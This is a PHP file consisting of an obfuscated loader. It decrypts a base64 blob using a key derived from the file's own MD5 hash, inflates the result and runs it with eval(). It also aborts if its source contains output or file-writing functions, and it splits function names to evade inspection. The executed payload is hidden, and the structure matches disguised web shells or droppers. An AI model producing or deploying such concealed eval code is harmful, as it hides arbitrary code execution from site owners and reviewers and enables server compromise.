<?php
$yptzefut="9e55ba7b9c29f2b20d33c88f797854fd";
$jzgzipttr="5f545154040507565f01050d5e565253515d075557080a040f5d070050065e5c";
$mbwrypcim="66I1LuVUJLGZKHR4WO1TkKAuMkqKKG2W5dy17JMwdXI9So9DmbqmQRVGecPq0NSC/epHx9BSffqc7GXqL+jZinHZ0HzxKBtz42Cs4JxQRdjIcecCHQI5wgj70ASnPz9cj7MIixQBDNqO2bOX1DpQ8REPGJsxEXx/fGX/xGS0zSf22AWxTPOAMx/3Ed+RjpAAmwPoZHGd/LPtEIm1jD8pFa9RVA+qClIN7SfW/VtlrBl6DWAz/U1wsrV2mvykpWNqTwsxcWCusWlBdfuhVsbeUGGmM2a9QAL+tsnGSTx9dkludBaCWxiAbcirGLgZL0lfhZbQzyQ1lNUpGnsRnsosLh5yOdtdl76bCH277QYP3pzWthWMgB+4bGRcjuhkgJts3nuHJ2XbOfnGoSdDC4xer5ZXxOM2I2aYeT4MgaEL1RaSlRyNAJnjohlK7fdBUU2lANpL984r";
$iekjuyetl=file_get_contents(__FILE__);
$ycqhti=str_replace($mbwrypcim,"",$iekjuyetl);
if(strpos($ycqhti,"ec"."ho")!==false||strpos($ycqhti,"pr"."int")!==false||strpos($ycqhti,"var_"."dump")!==false||strpos($ycqhti,"file_put_"."contents")!==false||strpos($ycqhti,"fw"."rite")!==false){die();}
$cwzcdf=str_replace(array($yptzefut,$jzgzipttr),array("SP_63857eac","KP_c6ae00b4"),$iekjuyetl);
$ozojaon=md5($cwzcdf);
$kphawij=hex2bin($jzgzipttr);
$osuiwbxmmqna="";
$glvatzbntbk=strlen($ozojaon);
for($flnyty=0;$flnyty<$glvatzbntbk;$flnyty++){
    $osuiwbxmmqna.=chr(ord($kphawij[$flnyty])^ord($ozojaon[$flnyty]));
}
$wfpefxaxkpr=base64_decode($mbwrypcim);
$greaqhfxnz=strlen($wfpefxaxkpr);
$vuphxoovudzg="";
$ovunfguxmiw=strlen($osuiwbxmmqna);
for($flnyty=0;$flnyty<$greaqhfxnz;$flnyty++){
    $vuphxoovudzg.=$wfpefxaxkpr[$flnyty]^$osuiwbxmmqna[$flnyty%$ovunfguxmiw];
}
$bxaqqn="gz"."in"."fl"."ate";
eval($bxaqqn($vuphxoovudzg));
